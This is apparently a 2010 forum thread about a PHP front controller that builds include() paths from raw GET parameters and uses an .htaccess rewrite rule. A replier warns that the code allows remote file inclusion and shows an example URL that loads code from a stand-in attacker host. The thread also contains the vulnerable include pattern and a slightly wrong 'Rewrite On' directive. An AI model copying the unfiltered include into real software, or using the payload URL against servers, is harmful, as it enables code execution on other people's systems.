Help with GET

jwilson122 · 11-26-2010, 01:08 AM

Okay so I'm creating my own framework script, the URL's are gonna be:
controller.php?folder=foldernamehere&page=pagename here

So in the controller.php I have..

PHP Code:


			
$folder = $_GET['folder'];

$page = $_GET['page'];

include('plugins/'.$folder.'/'.$page.'.php');

Then in .htaccess I will do:
Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2

Well, works out fine if I access say.. /users/index.php it will display the info perfect! But, on to my issue.
Well, say on that /users/index.php file, I want to get something from the URL... say, /users/index.php?user=bla
Well, it will not work for some reason! Any idea why? I believe its because I already have used it in the .htaccess file, but not sure.. How can I fix it? Thanks a lot!

sketchMedia · 11-26-2010, 03:31 PM

Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:


			
include "{$_GET['folder']}/include.php";

If i then do this:

Code:

http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?

In the PHP this would mean:

PHP Code:


			
include "http://evilscriptslol.com/evil.inc?/include.php";

Causing no end of problems (assuming allow_url_fopen) is enabled (as it is by default I believe)A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output - Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:

Code:

Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]

It should then pass any additional url parameters through.

jwilson122 · 11-27-2010, 12:36 AM

Quote:

Originally Posted by sketchMedia

Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:


			
include "{$_GET['folder']}/include.php";

If i then do this:

Code:

http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?

In the PHP this would mean:

PHP Code:


			
include "http://evilscriptslol.com/evil.inc?/include.php";

Causing no end of problems (assuming allow_url_fopen) is enabled (as it is by default I believe)A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output - Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:

Code:

Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]

It should then pass any additional url parameters through.

Thanks a lot! It says internal server error with your code :/

Quote:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

sketchMedia · 11-29-2010, 10:24 AM

Should work, can I see your full htaccess.